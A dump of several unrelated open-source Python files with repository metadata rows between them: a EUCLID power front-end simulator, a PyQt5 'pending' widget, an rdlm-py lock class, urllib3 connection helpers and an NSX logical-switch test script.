      LOG("set the SCOE into the OFFLINE operation mode", "SPACE")
      self.operationMode = EPWR_OP_OFFLINE
      return self.sendBS_Monitor()
    elif tcFunctionId == BS_SelfTest:
      LOG_INFO("*** BS_SelfTest ***", "SPACE")
      # the SELFTEST is only allowed in OFFLINE mode
      if self.operationMode == EPWR_OP_ONLINE:
        LOG_ERROR("SELFTEST not allowed when system is ONLINE", "SPACE")
        return False
    else:
      # unexpected Function ID
      LOG_WARNING("no simulation for Function ID " + str(tcFunctionId) + " implemented", "SPACE")
    return True
  # ---------------------------------------------------------------------------
  def sendBS_Monitor(self):
    """sends the BS_Monitor TM packet to CCS"""
    pktMnemonic = "BS_Monitor"
    params = EPWR_BS_OP
    values = self.operationMode
    tmPacketData = SUPP.IF.s_definitions.getTMpacketInjectData(pktMnemonic,
                                                               params,
                                                               values)
    # check the TM packet data
    if tmPacketData is None:
      LOG_ERROR("TM packet creation failed for " + pktMnemonic, "SPACE")
      return False
    # send the TM packet
    return SPACE.IF.s_onboardComputer.generateTMpacket(tmPacketData)
# =============================================================================
class EUCLIDpowerFEEsim_FTH(ApplicationSoftwareImpl):
  """Implementation of the EUCLID FTH Power Frontend Simulation"""
  # maps (NEA_ID, NEA_TYPE) ---> parameter name suffix, shared by the
  # FTH_ConfigNEA and FTH_SelectNEA telecommand handlers
  NEA_PARAM_SUFFIX = {("NEA1", "N"): "1N", ("NEA1", "R"): "1R",
                      ("NEA2", "N"): "2N", ("NEA2", "R"): "2R",
                      ("NEA3", "N"): "3N", ("NEA3", "R"): "3R"}
  # ---------------------------------------------------------------------------
  def __init__(self):
    """Initialise attributes only"""
    ApplicationSoftwareImpl.__init__(self)
    # SCOE state: commanding mode (LOCAL/REMOTE) and operation mode
    self.commandingMode = EPWR_CMD_LOCAL
    self.operationMode = EPWR_OP_OFFLINE
  # ---------------------------------------------------------------------------
  def _neaParamName(self, prefix, neaID, neaType):
    """
    maps the (NEA_ID, NEA_TYPE) pair to a monitoring parameter name;
    logs a warning and returns None for an invalid identifier combination
    """
    suffix = EUCLIDpowerFEEsim_FTH.NEA_PARAM_SUFFIX.get((neaID, neaType))
    if suffix is None:
      LOG_WARNING("invalid NEA_ID " + neaID + " or NEA_TYPE " + neaType, "SPACE")
      return None
    return prefix + suffix
  # ---------------------------------------------------------------------------
  def processFunctionService(self, apid, tcFunctionId, tcPacketDu):
    """
    processes PUS Service (8,1) telecommand packet
    implementation of ApplicationSoftwareImpl.processFunctionService
    returns False when the command fails, True otherwise
    """
    if tcFunctionId == FTH_Initialize:
      LOG_INFO("*** FTH_Initialize ***", "SPACE")
      LOG("push HKTM", "SPACE")
      return self.sendFTH_MonitorProUST()
    elif tcFunctionId == FTH_EnableGUI:
      LOG_INFO("*** FTH_EnableGUI ***", "SPACE")
      LOG("set the SCOE into the REMOTE commanding mode", "SPACE")
      self.commandingMode = EPWR_CMD_REMOTE
    elif tcFunctionId == FTH_DisableGUI:
      LOG_INFO("*** FTH_DisableGUI ***", "SPACE")
      LOG("set the SCOE into the LOCAL commanding mode", "SPACE")
      self.commandingMode = EPWR_CMD_LOCAL
    elif tcFunctionId == FTH_SetOnline:
      LOG_INFO("*** FTH_SetOnline ***", "SPACE")
      LOG("set the SCOE into the ONLINE operation mode", "SPACE")
      self.operationMode = EPWR_OP_FTH_ONLINE
      return self.sendFTH_MonitorProUST()
    elif tcFunctionId == FTH_SetOffline:
      LOG_INFO("*** FTH_SetOffline ***", "SPACE")
      LOG("set the SCOE into the OFFLINE operation mode", "SPACE")
      self.operationMode = EPWR_OP_OFFLINE
      return self.sendFTH_MonitorProUST()
    elif tcFunctionId == FTH_SelfTest:
      LOG_INFO("*** FTH_SelfTest ***", "SPACE")
      # the SELFTEST is only allowed in OFFLINE mode
      if self.operationMode == EPWR_OP_FTH_ONLINE:
        LOG_ERROR("SELFTEST not allowed when system is ONLINE", "SPACE")
        return False
    elif tcFunctionId == FTH_ConfigNEA:
      LOG_INFO("*** FTH_ConfigNEA ***", "SPACE")
      # decode the command parameters; the currents are transported as
      # signed micro-Ampere integers and converted here to Ampere floats
      pNEA_ID = tcPacketDu.getString(
        FTH_ConfigNEA_NEA_ID_BYTE_OFFSET, FTH_ConfigNEA_NEA_ID_BYTE_SIZE).rstrip('\0')
      pA_LO = tcPacketDu.getUnsigned(
        FTH_ConfigNEA_A_LO_BYTE_OFFSET, FTH_ConfigNEA_A_LO_BYTE_SIZE)
      pA_LO = UTIL.DU.unsigned2signed(pA_LO, FTH_ConfigNEA_A_LO_BYTE_SIZE) / 1000000.0
      pA_HI_min = tcPacketDu.getUnsigned(
        FTH_ConfigNEA_A_HI_min_BYTE_OFFSET, FTH_ConfigNEA_A_HI_min_BYTE_SIZE)
      pA_HI_min = UTIL.DU.unsigned2signed(pA_HI_min, FTH_ConfigNEA_A_HI_min_BYTE_SIZE) / 1000000.0
      pA_HI_max = tcPacketDu.getUnsigned(
        FTH_ConfigNEA_A_HI_max_BYTE_OFFSET, FTH_ConfigNEA_A_HI_max_BYTE_SIZE)
      pA_HI_max = UTIL.DU.unsigned2signed(pA_HI_max, FTH_ConfigNEA_A_HI_max_BYTE_SIZE) / 1000000.0
      pA_Tmin = tcPacketDu.getUnsigned(
        FTH_ConfigNEA_Tmin_BYTE_OFFSET, FTH_ConfigNEA_Tmin_BYTE_SIZE)
      pA_Tmax = tcPacketDu.getUnsigned(
        FTH_ConfigNEA_Tmax_BYTE_OFFSET, FTH_ConfigNEA_Tmax_BYTE_SIZE)
      pNEA_TYPE = tcPacketDu.getString(
        FTH_ConfigNEA_NEA_TYPE_BYTE_OFFSET, FTH_ConfigNEA_NEA_TYPE_BYTE_SIZE).rstrip('\0')
      LOG_INFO("pNEA_ID = " + pNEA_ID, "SPACE")
      LOG_INFO("pA_LO = " + str(pA_LO), "SPACE")
      LOG_INFO("pA_HI_min = " + str(pA_HI_min), "SPACE")
      LOG_INFO("pA_HI_max = " + str(pA_HI_max), "SPACE")
      LOG_INFO("pA_Tmin = " + str(pA_Tmin), "SPACE")
      LOG_INFO("pA_Tmax = " + str(pA_Tmax), "SPACE")
      LOG_INFO("pNEA_TYPE = " + pNEA_TYPE, "SPACE")
      # the times are integers: a trailing ".0" makes them look like floats
      neaMask = str(pA_LO) + "," + str(pA_HI_min) + "," + str(pA_HI_max) + \
                "," + str(pA_Tmin) + ".0," + str(pA_Tmax) + ".0"
      paramName = self._neaParamName("NEA_MASK_", pNEA_ID, pNEA_TYPE)
      if paramName is None:
        # invalid NEA_Mask identifiers (warning already logged)
        return False
      return self.sendFTH_MonitorProUST_withStringParam(paramName, neaMask, FTH_NEA_Mask_BYTE_SIZE)
    elif tcFunctionId == FTH_SelectNEA:
      LOG_INFO("*** FTH_SelectNEA ***", "SPACE")
      pNEA_ID = tcPacketDu.getString(
        FTH_SelectNEA_NEA_ID_BYTE_OFFSET, FTH_SelectNEA_NEA_ID_BYTE_SIZE).rstrip('\0')
      pNEA_TYPE = tcPacketDu.getString(
        FTH_SelectNEA_NEA_TYPE_BYTE_OFFSET, FTH_SelectNEA_NEA_TYPE_BYTE_SIZE).rstrip('\0')
      pSelect = tcPacketDu.getUnsigned(
        FTH_SelectNEA_select_BYTE_OFFSET, FTH_SelectNEA_select_BYTE_SIZE)
      LOG_INFO("pNEA_ID = " + pNEA_ID, "SPACE")
      LOG_INFO("pNEA_TYPE = " + pNEA_TYPE, "SPACE")
      LOG_INFO("pSelect = " + str(pSelect), "SPACE")
      if pSelect == 1:
        neaPulse = "0,0.0,0.0,None,Selected"
      else:
        neaPulse = "0,0.0,0.0,None,Unselected"
      paramName = self._neaParamName("NEA_PULSE_", pNEA_ID, pNEA_TYPE)
      if paramName is None:
        # invalid NEA_Pulse identifiers (warning already logged)
        return False
      return self.sendFTH_MonitorProUST_withStringParam(paramName, neaPulse, FTH_NEA_Pulse_BYTE_SIZE)
    else:
      # unexpected Function ID
      LOG_WARNING("no simulation for Function ID " + str(tcFunctionId) + " implemented", "SPACE")
    return True
  # ---------------------------------------------------------------------------
  def sendFTH_MonitorProUST(self):
    """sends the FTH_MonitorProUST TM packet to CCS"""
    pktMnemonic = "FTH_MonitorProUST"
    params = EPWR_FTH_OP
    values = self.operationMode
    tmPacketData = SUPP.IF.s_definitions.getTMpacketInjectData(pktMnemonic,
                                                               params,
                                                               values)
    # check the TM packet data
    if tmPacketData is None:
      LOG_ERROR("TM packet creation failed for " + pktMnemonic, "SPACE")
      return False
    # send the TM packet
    return SPACE.IF.s_onboardComputer.generateTMpacket(tmPacketData)
  # ---------------------------------------------------------------------------
  def sendFTH_MonitorProUST_withStringParam(self, paramName, paramValue, paramSize):
    """sends the FTH_MonitorProUST TM packet with one extra string parameter"""
    pktMnemonic = "FTH_MonitorProUST"
    params = ""
    values = ""
    tmPacketData = SUPP.IF.s_definitions.getTMpacketInjectData(pktMnemonic,
                                                               params,
                                                               values)
    # check the TM packet data
    if tmPacketData is None:
      LOG_ERROR("TM packet creation failed for " + pktMnemonic, "SPACE")
      return False
    # force the correct parameter size (pad/truncate) and add the parameter
    paramValue = paramValue.ljust(paramSize)[0:paramSize]
    tmPacketData.parameterValuesList.append([paramName, paramValue])
    # send the TM packet
    return SPACE.IF.s_onboardComputer.generateTMpacket(tmPacketData)
# =============================================================================
class EUCLIDpowerFEEsim_LPS_SAS(ApplicationSoftwareImpl):
  """Implementation of the EUCLID LPS/SAS Power Frontend Simulation"""
  # ---------------------------------------------------------------------------
  def __init__(self, isNominal):
    """Initialise attributes only"""
    ApplicationSoftwareImpl.__init__(self)
    # True ---> LPS nominal (LPSN), False ---> LPS redundant (LPSR)
    self.isNominal = isNominal
    self.commandingMode = EPWR_CMD_LOCAL
    self.lpsOperationMode = EPWR_OP_OFFLINE
    self.sasOperationMode = EPWR_OP_OFFLINE
    self.scoeRunning = EPWR_SRUN_SAS
  # ---------------------------------------------------------------------------
  def processFunctionService(self, apid, tcFunctionId, tcPacketDu):
    """
    processes PUS Service (8,1) telecommand packet
    implementation of ApplicationSoftwareImpl.processFunctionService
    returns False when the command fails, True otherwise
    """
    if tcFunctionId == LPS_Initialize:
      LOG_INFO("*** LPS_Initialize ***", "SPACE")
      LOG("set the SCOE into the LPSN running mode", "SPACE")
      if self.isNominal:
        self.scoeRunning = EPWR_SRUN_LPSN
      else:
        self.scoeRunning = EPWR_SRUN_LPSR
      return self.sendLPS_Monitor()
    elif tcFunctionId == LPS_SetLocal:
      LOG_INFO("*** LPS_SetLocal ***", "SPACE")
      LOG("set the SCOE into the LOCAL commanding mode", "SPACE")
      self.commandingMode = EPWR_CMD_LOCAL
    elif tcFunctionId == LPS_SetRemote:
      LOG_INFO("*** LPS_SetRemote ***", "SPACE")
      LOG("set the SCOE into the REMOTE commanding mode", "SPACE")
      self.commandingMode = EPWR_CMD_REMOTE
    elif tcFunctionId == LPS_LockInstruments:
      LOG_INFO("*** LPS_LockInstruments ***", "SPACE")
      LOG("not used for simulation", "SPACE")
    elif tcFunctionId == LPS_UnlockInstruments:
      LOG_INFO("*** LPS_UnlockInstruments ***", "SPACE")
      LOG("not used for simulation", "SPACE")
    elif tcFunctionId == LPS_SetOnLine:
      LOG_INFO("*** LPS_SetOnLine ***", "SPACE")
      LOG("set the SCOE into the ONLINE operation mode", "SPACE")
      self.lpsOperationMode = EPWR_OP_ONLINE
      return self.sendLPS_Monitor()
    elif tcFunctionId == LPS_SetOffLine:
      LOG_INFO("*** LPS_SetOffLine ***", "SPACE")
      LOG("set the SCOE into the OFFLINE operation mode", "SPACE")
      self.lpsOperationMode = EPWR_OP_OFFLINE
      return self.sendLPS_Monitor()
    elif tcFunctionId == LPS_SelfTest:
      LOG_INFO("*** LPS_SelfTest ***", "SPACE")
    elif tcFunctionId == SAS_Initialize:
      LOG_INFO("*** SAS_Initialize ***", "SPACE")
      LOG("set the SCOE into the SAS running mode", "SPACE")
      self.scoeRunning = EPWR_SRUN_SAS
      return self.sendLPS_Monitor()
    elif tcFunctionId == SAS_SetLocal:
      LOG_INFO("*** SAS_SetLocal ***", "SPACE")
      self.commandingMode = EPWR_CMD_LOCAL
    elif tcFunctionId == SAS_SetRemote:
      LOG_INFO("*** SAS_SetRemote ***", "SPACE")
      self.commandingMode = EPWR_CMD_REMOTE
    elif tcFunctionId == SAS_LockInstruments:
      LOG_INFO("*** SAS_LockInstruments ***", "SPACE")
      LOG("not used for simulation", "SPACE")
    elif tcFunctionId == SAS_UnlockInstruments:
      LOG_INFO("*** SAS_UnlockInstruments ***", "SPACE")
      LOG("not used for simulation", "SPACE")
    elif tcFunctionId == SAS_SetOnline:
      LOG_INFO("*** SAS_SetOnline ***", "SPACE")
      # bug fix: the log text wrongly said OFFLINE although the handler
      # enters the ONLINE operation mode
      LOG("set the SCOE into the ONLINE operation mode", "SPACE")
      self.sasOperationMode = EPWR_OP_ONLINE
      return self.sendSAS_Monitor()
    elif tcFunctionId == SAS_SetOffline:
      LOG_INFO("*** SAS_SetOffline ***", "SPACE")
      self.sasOperationMode = EPWR_OP_OFFLINE
      return self.sendSAS_Monitor()
    elif tcFunctionId == SAS_SelfTest:
      LOG_INFO("*** SAS_SelfTest ***", "SPACE")
    else:
      # unexpected Function ID
      LOG_WARNING("no simulation for Function ID " + str(tcFunctionId) + " implemented", "SPACE")
    return True
  # ---------------------------------------------------------------------------
  def sendLPS_Monitor(self):
    """sends the LPS_Monitor TM packet to CCS"""
    pktMnemonic = "LPS_Monitor"
    # one running-mode parameter plus 6 section operation mode parameters,
    # all sections report the same LPS operation mode
    params = ",".join([EPWR_SRUN_PARAMS,
                       EPWR_LPS_OP_Section1P, EPWR_LPS_OP_Section1S,
                       EPWR_LPS_OP_Section2P, EPWR_LPS_OP_Section2S,
                       EPWR_LPS_OP_Section3P, EPWR_LPS_OP_Section3S])
    values = ",".join([self.scoeRunning] + [self.lpsOperationMode] * 6)
    tmPacketData = SUPP.IF.s_definitions.getTMpacketInjectData(pktMnemonic,
                                                               params,
                                                               values)
    # check the TM packet data
    if tmPacketData is None:
      LOG_ERROR("TM packet creation failed for " + pktMnemonic, "SPACE")
      return False
    # send the TM packet
    return SPACE.IF.s_onboardComputer.generateTMpacket(tmPacketData)
  # ---------------------------------------------------------------------------
  def sendSAS_Monitor(self):
    """sends the SAS_Monitor TM packet to CCS"""
    pktMnemonic = "SAS_Monitor"
    # 15 section operation mode parameters, all set to the same mode
    sectionParams = [EPWR_SAS_OP_Section1, EPWR_SAS_OP_Section2,
                     EPWR_SAS_OP_Section3, EPWR_SAS_OP_Section4,
                     EPWR_SAS_OP_Section5, EPWR_SAS_OP_Section6,
                     EPWR_SAS_OP_Section7, EPWR_SAS_OP_Section8,
                     EPWR_SAS_OP_Section9, EPWR_SAS_OP_Section10,
                     EPWR_SAS_OP_Section11, EPWR_SAS_OP_Section12,
                     EPWR_SAS_OP_Section13, EPWR_SAS_OP_Section14,
                     EPWR_SAS_OP_Section15]
    params = ",".join(sectionParams)
    values = ",".join([self.sasOperationMode] * len(sectionParams))
    tmPacketData = SUPP.IF.s_definitions.getTMpacketInjectData(pktMnemonic,
                                                               params,
                                                               values)
    # check the TM packet data
    if tmPacketData is None:
      LOG_ERROR("TM packet creation failed for " + pktMnemonic, "SPACE")
      return False
    # send the TM packet
    return SPACE.IF.s_onboardComputer.generateTMpacket(tmPacketData)
#############
# functions #
#############
def init():
  """initialise singleton(s)"""
  mission = UTIL.SYS.s_configuration.ASW_MISSION
  # dispatch table: mission name ---> application software factory
  factories = {
    "MTG": MTGapplicationSoftwareImpl,
    "S4": S4applicationSoftwareImpl,
    "EUCLID_BS": EUCLIDpowerFEEsim_BS,
    "EUCLID_FTH": EUCLIDpowerFEEsim_FTH,
    "EUCLID_LPSN": lambda: EUCLIDpowerFEEsim_LPS_SAS(True),
    "EUCLID_LPSR": lambda: EUCLIDpowerFEEsim_LPS_SAS(False)}
  # unknown missions fall back to the generic application software
  factory = factories.get(mission, ApplicationSoftwareImpl)
  SPACE.IF.s_applicationSoftware = factory()
| mit | -8,097,726,725,551,173,000 | 43.964431 | 128 | 0.593242 | false | 3.422946 | true | false | false |
ric2b/confidential-debt-simplification | client/ui_pending.py | 1 | 5260 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'pending.ui'
#
# Created by: PyQt5 UI code generator 5.7.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_PendingWidget(object):
    """pyuic5-generated UI for the 'pending' widget: a tab widget with a
    'Loans' and a 'Debts' table plus a 'Refresh' button.

    NOTE: generated from pending.ui -- manual edits are lost on regeneration;
    change the .ui file instead.
    """
    def setupUi(self, PendingWidget):
        """Build the widget hierarchy and wire up the signal connections."""
        PendingWidget.setObjectName("PendingWidget")
        PendingWidget.resize(542, 297)
        self.verticalLayout = QtWidgets.QVBoxLayout(PendingWidget)
        self.verticalLayout.setObjectName("verticalLayout")
        self.tab_widget = QtWidgets.QTabWidget(PendingWidget)
        self.tab_widget.setObjectName("tab_widget")
        # "Loans" tab: read-only 5-column table
        self.loans_tab = QtWidgets.QWidget()
        self.loans_tab.setObjectName("loans_tab")
        self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.loans_tab)
        self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
        self.verticalLayout_2.setObjectName("verticalLayout_2")
        self.loans_table = QtWidgets.QTableWidget(self.loans_tab)
        self.loans_table.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
        self.loans_table.setObjectName("loans_table")
        self.loans_table.setColumnCount(5)
        self.loans_table.setRowCount(0)
        item = QtWidgets.QTableWidgetItem()
        self.loans_table.setHorizontalHeaderItem(0, item)
        item = QtWidgets.QTableWidgetItem()
        self.loans_table.setHorizontalHeaderItem(1, item)
        item = QtWidgets.QTableWidgetItem()
        self.loans_table.setHorizontalHeaderItem(2, item)
        item = QtWidgets.QTableWidgetItem()
        self.loans_table.setHorizontalHeaderItem(3, item)
        item = QtWidgets.QTableWidgetItem()
        self.loans_table.setHorizontalHeaderItem(4, item)
        self.verticalLayout_2.addWidget(self.loans_table)
        self.tab_widget.addTab(self.loans_tab, "")
        # "Debts" tab: read-only 5-column table
        self.debts_tab = QtWidgets.QWidget()
        self.debts_tab.setObjectName("debts_tab")
        self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.debts_tab)
        self.verticalLayout_3.setContentsMargins(0, 0, 0, 0)
        self.verticalLayout_3.setObjectName("verticalLayout_3")
        self.debts_table = QtWidgets.QTableWidget(self.debts_tab)
        self.debts_table.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
        self.debts_table.setObjectName("debts_table")
        self.debts_table.setColumnCount(5)
        self.debts_table.setRowCount(0)
        item = QtWidgets.QTableWidgetItem()
        self.debts_table.setHorizontalHeaderItem(0, item)
        item = QtWidgets.QTableWidgetItem()
        self.debts_table.setHorizontalHeaderItem(1, item)
        item = QtWidgets.QTableWidgetItem()
        self.debts_table.setHorizontalHeaderItem(2, item)
        item = QtWidgets.QTableWidgetItem()
        self.debts_table.setHorizontalHeaderItem(3, item)
        item = QtWidgets.QTableWidgetItem()
        self.debts_table.setHorizontalHeaderItem(4, item)
        self.verticalLayout_3.addWidget(self.debts_table)
        self.tab_widget.addTab(self.debts_tab, "")
        self.verticalLayout.addWidget(self.tab_widget)
        # bottom row: spacer + right-aligned refresh button
        self.horizontalLayout = QtWidgets.QHBoxLayout()
        self.horizontalLayout.setObjectName("horizontalLayout")
        spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem)
        self.refresh_button = QtWidgets.QPushButton(PendingWidget)
        self.refresh_button.setObjectName("refresh_button")
        self.horizontalLayout.addWidget(self.refresh_button)
        self.verticalLayout.addLayout(self.horizontalLayout)
        self.retranslateUi(PendingWidget)
        self.tab_widget.setCurrentIndex(0)
        # the refresh button triggers PendingWidget.refresh (slot on the form)
        self.refresh_button.clicked.connect(PendingWidget.refresh)
        QtCore.QMetaObject.connectSlotsByName(PendingWidget)
    def retranslateUi(self, PendingWidget):
        """Apply translated display strings to all widgets.

        Header item 0 of both tables deliberately gets no text.
        """
        _translate = QtCore.QCoreApplication.translate
        PendingWidget.setWindowTitle(_translate("PendingWidget", "Form"))
        item = self.loans_table.horizontalHeaderItem(1)
        item.setText(_translate("PendingWidget", "UOMe ID"))
        item = self.loans_table.horizontalHeaderItem(2)
        item.setText(_translate("PendingWidget", "Borrower"))
        item = self.loans_table.horizontalHeaderItem(3)
        item.setText(_translate("PendingWidget", "Amount"))
        item = self.loans_table.horizontalHeaderItem(4)
        item.setText(_translate("PendingWidget", "Description"))
        self.tab_widget.setTabText(self.tab_widget.indexOf(self.loans_tab), _translate("PendingWidget", "Loans"))
        item = self.debts_table.horizontalHeaderItem(1)
        item.setText(_translate("PendingWidget", "UOMe ID"))
        item = self.debts_table.horizontalHeaderItem(2)
        item.setText(_translate("PendingWidget", "Loaner"))
        item = self.debts_table.horizontalHeaderItem(3)
        item.setText(_translate("PendingWidget", "Amount"))
        item = self.debts_table.horizontalHeaderItem(4)
        item.setText(_translate("PendingWidget", "Description"))
        self.tab_widget.setTabText(self.tab_widget.indexOf(self.debts_tab), _translate("PendingWidget", "Debts"))
        self.refresh_button.setText(_translate("PendingWidget", "Refresh"))
| gpl-3.0 | 1,727,756,830,978,285,000 | 51.6 | 114 | 0.706274 | false | 3.856305 | false | false | false |
thefab/rdlm-py | rdlmpy/lock.py | 1 | 1695 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is part of rdlm-py released under the MIT license.
# See the LICENSE file for more information.
import json
import datetime
from rdlmpy.exceptions import RDLMClientException
def iso8601_to_datetime(iso8601_string):
    """Parse the leading 'YYYY-MM-DDTHH:MM:SS' part of an ISO-8601 string.

    Anything after the seconds field (fractional seconds, timezone suffix)
    is ignored.
    """
    truncated = iso8601_string[:19]
    return datetime.datetime.strptime(truncated, "%Y-%m-%dT%H:%M:%S")
class RDLMLock(object):
    '''
    Class which defines a lock object
    '''

    # lock attributes, filled by factory() from the server JSON reply
    url = None
    title = None
    uid = None
    lifetime = None
    wait = None
    active_since = None
    active_expires = None
    wait_since = None
    wait_expires = None

    def __init__(self, url):
        self.url = url

    @staticmethod
    def factory(url, get_request_output):
        '''
        Builds a RDLMActiveLock or RDLMWaitingLock object from the JSON
        body of a GET request; raises RDLMClientException when the reply
        cannot be decoded.
        '''
        res = None
        try:
            tmp = json.loads(get_request_output)
            if tmp['active']:
                res = RDLMActiveLock(url)
                res.active_since = iso8601_to_datetime(tmp['active_since'])
                res.active_expires = iso8601_to_datetime(tmp['active_expires'])
            else:
                res = RDLMWaitingLock(url)
                res.wait_since = iso8601_to_datetime(tmp['wait_since'])
                res.wait_expires = iso8601_to_datetime(tmp['wait_expires'])
            res.title = tmp['title']
            res.uid = tmp['uid']
            res.lifetime = tmp['lifetime']
            res.wait = tmp['wait']
        # a bare "except:" would also swallow SystemExit/KeyboardInterrupt
        except Exception:
            raise RDLMClientException("impossible to build the lock object")
        return res
class RDLMActiveLock(RDLMLock):
@property
def active(self):
return True
class RDLMWaitingLock(RDLMLock):
@property
def active(self):
return False
| mit | 1,096,588,072,310,464,300 | 24.298507 | 80 | 0.59174 | false | 3.783482 | false | false | false |
benesch/pip | pip/_vendor/requests/packages/urllib3/util/connection.py | 365 | 4744 | from __future__ import absolute_import
import socket
try:
from select import poll, POLLIN
except ImportError: # `poll` doesn't exist on OSX and other platforms
poll = False
try:
from select import select
except ImportError: # `select` doesn't exist on AppEngine.
select = False
def is_connection_dropped(conn): # Platform-specific
"""
Returns True if the connection is dropped and should be closed.
:param conn:
:class:`httplib.HTTPConnection` object.
Note: For platforms like AppEngine, this will always return ``False`` to
let the platform handle connection recycling transparently for us.
"""
sock = getattr(conn, 'sock', False)
if sock is False: # Platform-specific: AppEngine
return False
if sock is None: # Connection already closed (such as by httplib).
return True
if not poll:
if not select: # Platform-specific: AppEngine
return False
try:
return select([sock], [], [], 0.0)[0]
except socket.error:
return True
# This version is better on platforms that support it.
p = poll()
p.register(sock, POLLIN)
for (fno, ev) in p.poll(0.0):
if fno == sock.fileno():
# Either data is buffered (bad), or the connection is dropped.
return True
# This function is copied from socket.py in the Python 2.7 standard
# library test suite. Added to its signature is only `socket_options`.
# One additional modification is that we avoid binding to IPv6 servers
# discovered in DNS if the system doesn't have IPv6 functionality.
def create_connection(address, timeout=socket._GLOBAL_DEFAULT_TIMEOUT,
source_address=None, socket_options=None):
"""Connect to *address* and return the socket object.
Convenience function. Connect to *address* (a 2-tuple ``(host,
port)``) and return the socket object. Passing the optional
*timeout* parameter will set the timeout on the socket instance
before attempting to connect. If no *timeout* is supplied, the
global default timeout setting returned by :func:`getdefaulttimeout`
is used. If *source_address* is set it must be a tuple of (host, port)
for the socket to bind as a source address before making the connection.
An host of '' or port 0 tells the OS to use the default.
"""
host, port = address
if host.startswith('['):
host = host.strip('[]')
err = None
# Using the value from allowed_gai_family() in the context of getaddrinfo lets
# us select whether to work with IPv4 DNS records, IPv6 records, or both.
# The original create_connection function always returns all records.
family = allowed_gai_family()
for res in socket.getaddrinfo(host, port, family, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = None
try:
sock = socket.socket(af, socktype, proto)
# If provided, set socket level options before connecting.
_set_socket_options(sock, socket_options)
if timeout is not socket._GLOBAL_DEFAULT_TIMEOUT:
sock.settimeout(timeout)
if source_address:
sock.bind(source_address)
sock.connect(sa)
return sock
except socket.error as e:
err = e
if sock is not None:
sock.close()
sock = None
if err is not None:
raise err
raise socket.error("getaddrinfo returns an empty list")
def _set_socket_options(sock, options):
if options is None:
return
for opt in options:
sock.setsockopt(*opt)
def allowed_gai_family():
"""This function is designed to work in the context of
getaddrinfo, where family=socket.AF_UNSPEC is the default and
will perform a DNS search for both IPv6 and IPv4 records."""
family = socket.AF_INET
if HAS_IPV6:
family = socket.AF_UNSPEC
return family
def _has_ipv6(host):
""" Returns True if the system can bind an IPv6 address. """
sock = None
has_ipv6 = False
if socket.has_ipv6:
# has_ipv6 returns true if cPython was compiled with IPv6 support.
# It does not tell us if the system has IPv6 support enabled. To
# determine that we must bind to an IPv6 address.
# https://github.com/shazow/urllib3/pull/611
# https://bugs.python.org/issue658327
try:
sock = socket.socket(socket.AF_INET6)
sock.bind((host, 0))
has_ipv6 = True
except Exception:
pass
if sock:
sock.close()
return has_ipv6
HAS_IPV6 = _has_ipv6('::1')
| mit | 7,948,240,712,715,729,000 | 31.944444 | 82 | 0.636172 | false | 4.157756 | false | false | false |
vmware/nsxramlclient | tests/logicalswitch.py | 1 | 3893 | # coding=utf-8
#
# Copyright © 2015 VMware, Inc. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions
# of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
# TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
__author__ = 'yfauser'
from tests.config import *
from nsxramlclient.client import NsxClient
import time
TRANSPORT_ZONE = 'TZ1'
client_session = NsxClient(nsxraml_file, nsxmanager, nsx_username, nsx_password, debug=True)
# find the objectId of the Scope with the name of the Transport Zone
vdn_scopes = client_session.read('vdnScopes', 'read')['body']
vdn_scope_dict_list = [scope_dict for scope_dict in vdn_scopes['vdnScopes'].items()]
vdn_scope = [scope[1]['objectId'] for scope in vdn_scope_dict_list if scope[1]['name'] == TRANSPORT_ZONE][0]
# get a template dict for the lswitch create
lswitch_create_dict = client_session.extract_resource_body_example('logicalSwitches', 'create')
client_session.view_body_dict(lswitch_create_dict)
# fill the details for the new lswitch in the body dict
lswitch_create_dict['virtualWireCreateSpec']['controlPlaneMode'] = 'UNICAST_MODE'
lswitch_create_dict['virtualWireCreateSpec']['name'] = 'TestLogicalSwitch1'
lswitch_create_dict['virtualWireCreateSpec']['tenantId'] = 'Tenant1'
# create new lswitch
new_ls = client_session.create('logicalSwitches', uri_parameters={'scopeId': vdn_scope},
request_body_dict=lswitch_create_dict)
client_session.view_response(new_ls)
# list all logical switches
all_lswitches = client_session.read('logicalSwitchesGlobal')
client_session.view_response(all_lswitches)
# list all logical switches in transport Zone
tz_lswitches = client_session.read('logicalSwitches', uri_parameters={'scopeId': vdn_scope})
client_session.view_response(tz_lswitches)
# Read the properties of the new logical switch
new_ls_props = client_session.read('logicalSwitch', uri_parameters={'virtualWireID': new_ls['objectId']})
client_session.view_response(new_ls_props)
time.sleep(5)
# update the properties of the new logical switch (name)
updated_ls_dict = new_ls_props['body']
updated_ls_dict['virtualWire']['name'] = 'ThisIsANewName'
update_resp = client_session.update('logicalSwitch', uri_parameters={'virtualWireID': new_ls['objectId']},
request_body_dict=updated_ls_dict)
time.sleep(5)
# delete new logical created ealier
client_session.delete('logicalSwitch', uri_parameters={'virtualWireID': new_ls['objectId']})
#TODO: test moving a VM to the new logical switch
